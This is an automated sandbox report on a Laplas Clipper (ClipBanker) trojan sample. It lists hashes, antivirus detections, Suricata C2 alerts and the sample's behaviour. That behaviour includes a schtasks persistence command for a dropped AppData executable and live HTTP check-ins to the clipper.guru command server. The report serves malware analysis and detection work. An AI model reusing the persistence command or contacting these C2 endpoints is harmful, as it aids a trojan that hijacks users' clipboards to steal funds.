Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Dec. 19, 2022, 6:08 p.m.	Dec. 19, 2022, 6:11 p.m.

Size	8.6MB
Type	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5	`2160b328dfdbbe8080a40f80ae87af73`
SHA256	`3fc2b54f096ed132efadac0b097ebf55c867e346f5685588981f40310997452f`
CRC32	`08AFA4D6`
ssdeep	`196608:hT73/ahrYWuQouogKsCuo5aKmU/FkcDrhwJb2No+dFBP6:hT73/azo91la6/Fkcn+0o+dF16`
Yara	IsPE32 - (no description) OS_Processor_Check_Zero - OS Processor Check Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature UPX_Zero - UPX packed file

Clip1.exe "C:\Users\test22\AppData\Local\Temp\Clip1.exe"
2556
- cmd.exe cmd.exe /C schtasks /create /tn CthDkNHxan /tr C:\Users\test22\AppData\Roaming\CthDkNHxan\SIAEwHQlys.exe /st 00:00 /du 9999:59 /sc once /ri 1 /f
  2732
  - schtasks.exe schtasks /create /tn CthDkNHxan /tr C:\Users\test22\AppData\Roaming\CthDkNHxan\SIAEwHQlys.exe /st 00:00 /du 9999:59 /sc once /ri 1 /f
    2796

Name	Response	Post-Analysis Lookup
clipper.guru	A 45.159.189.115	45.159.189.115

IP Address	Status	Action
164.124.101.2	Active	Moloch
45.159.189.115	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49167 -> 45.159.189.115:80	2039776	ET MALWARE Laplas Clipper - SetOnline CnC Checkin	A Network Trojan was detected
TCP 192.168.56.101:49167 -> 45.159.189.115:80	2024897	ET USER_AGENTS Go HTTP Client User-Agent	Misc activity
TCP 192.168.56.101:49167 -> 45.159.189.115:80	2039775	ET MALWARE Laplas Clipper - Regex CnC Request	A Network Trojan was detected
TCP 192.168.56.101:49167 -> 45.159.189.115:80	2024897	ET USER_AGENTS Go HTTP Client User-Agent	Misc activity
UDP 192.168.56.101:59002 -> 164.124.101.2:53	2039774	ET MALWARE Laplas Clipper CnC Domain (clipper .guru) in DNS Lookup	Domain Observed Used for C2 Detected

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Dec. 19, 2022, 6:09 p.m.	computer_name: TEST22-PC	1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (9 events)

section	XK#QA^#T
section	ECAAOMCY
section	J^Y)(&LB
section	OA_$N*^X
section	FOGX)TVS
section	MMQ(#RTR
section	$#TWEFDS
section	NFL#_W^&
section	%XAKVFQP

Performs some HTTP requests (2 events)

request	GET http://clipper.guru/bot/online?guid=test22-PC\test22&key=dd611369e3344bc4aad751531e739d725fb32f33363f67a0bf7a4ea33213af63
request	GET http://clipper.guru/bot/regex?key=dd611369e3344bc4aad751531e739d725fb32f33363f67a0bf7a4ea33213af63

Allocates read-write-execute memory (usually to unpack itself) (7 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Dec. 19, 2022, 6:09 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00340000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 19, 2022, 6:09 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004c0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 19, 2022, 6:09 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004d0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 19, 2022, 6:09 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 19, 2022, 6:09 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004f0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 19, 2022, 6:09 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00500000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 19, 2022, 6:09 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007b0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Roaming\CthDkNHxan\SIAEwHQlys.exe

Creates a suspicious process (2 events)

cmdline	cmd.exe /C schtasks /create /tn CthDkNHxan /tr C:\Users\test22\AppData\Roaming\CthDkNHxan\SIAEwHQlys.exe /st 00:00 /du 9999:59 /sc once /ri 1 /f
cmdline	schtasks /create /tn CthDkNHxan /tr C:\Users\test22\AppData\Roaming\CthDkNHxan\SIAEwHQlys.exe /st 00:00 /du 9999:59 /sc once /ri 1 /f

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Roaming\CthDkNHxan\SIAEwHQlys.exe

The binary likely contains encrypted or compressed data indicative of a packer (3 events)

section

{u'size_of_data': u'0x00854000', u'virtual_address': u'0x00831000', u'entropy': 7.9808323913891765, u'name': u'$#TWEFDS', u'virtual_size': u'0x00853e90'}

entropy

7.98083239139

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x0003ce00', u'virtual_address': u'0x01086000', u'entropy': 6.918001193067837, u'name': u'%XAKVFQP', u'virtual_size': u'0x0003cc28'}

entropy

6.91800119307

description

A section with a high entropy has been found

entropy

0.999715067244

description

Overall entropy of this PE file is high

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	cmd.exe /C schtasks /create /tn CthDkNHxan /tr C:\Users\test22\AppData\Roaming\CthDkNHxan\SIAEwHQlys.exe /st 00:00 /du 9999:59 /sc once /ri 1 /f
cmdline	schtasks /create /tn CthDkNHxan /tr C:\Users\test22\AppData\Roaming\CthDkNHxan\SIAEwHQlys.exe /st 00:00 /du 9999:59 /sc once /ri 1 /f

Installs itself for autorun at Windows startup (2 events)

cmdline	cmd.exe /C schtasks /create /tn CthDkNHxan /tr C:\Users\test22\AppData\Roaming\CthDkNHxan\SIAEwHQlys.exe /st 00:00 /du 9999:59 /sc once /ri 1 /f
cmdline	schtasks /create /tn CthDkNHxan /tr C:\Users\test22\AppData\Roaming\CthDkNHxan\SIAEwHQlys.exe /st 00:00 /du 9999:59 /sc once /ri 1 /f

Uses Sysinternals tools in order to add additional command line functionality (2 events)

cmdline	cmd.exe /C schtasks /create /tn CthDkNHxan /tr C:\Users\test22\AppData\Roaming\CthDkNHxan\SIAEwHQlys.exe /st 00:00 /du 9999:59 /sc once /ri 1 /f
cmdline	schtasks /create /tn CthDkNHxan /tr C:\Users\test22\AppData\Roaming\CthDkNHxan\SIAEwHQlys.exe /st 00:00 /du 9999:59 /sc once /ri 1 /f

Detects the presence of Wine emulator (1 event)

Time & API	Arguments	Status	Return	Repeated
LdrGetProcedureAddress Dec. 19, 2022, 6:09 p.m.	ordinal: 0 function_address: 0x002ffbf5 function_name: wine_get_version module: ntdll module_address: 0x76f10000		3221225785	0

File has been identified by 29 AntiVirus engines on VirusTotal as malicious (29 events)

Bkav	W32.AIDetect.malware1
MicroWorld-eScan	Gen:Variant.Babar.82051
FireEye	Generic.mg.2160b328dfdbbe80
ALYac	Gen:Variant.Babar.82051
VIPRE	Gen:Variant.Babar.82051
Sangfor	Trojan.Win32.Save.a
Cybereason	malicious.ab8183
BitDefenderTheta	Gen:NN.ZexaF.36106.@Z0@ain1xtji
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (high confidence)
APEX	Malicious
Kaspersky	UDS:Trojan-Banker.Win32.ClipBanker.wpt
BitDefender	Gen:Variant.Babar.82051
Avast	FileRepMalware [Trj]
Ad-Aware	Gen:Variant.Babar.82051
Sophos	Generic ML PUA (PUA)
McAfee-GW-Edition	BehavesLike.Win32.Generic.rc
Trapmine	malicious.high.ml.score
Emsisoft	Gen:Variant.Babar.82051 (B)
SentinelOne	Static AI - Suspicious PE
Gridinsoft	Trojan.Heur!.02212121
Arcabit	Trojan.Babar.D14083
ZoneAlarm	UDS:Trojan-Banker.Win32.ClipBanker.wpt
GData	Gen:Variant.Babar.82051
Cynet	Malicious (score: 100)
MAX	malware (ai score=83)
Rising	Trojan.Generic@AI.88 (RDML:OB4qS+CxeaURKO5003Locg)
MaxSecure	Trojan.Malware.300983.susgen
AVG	FileRepMalware [Trj]

Clip1.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All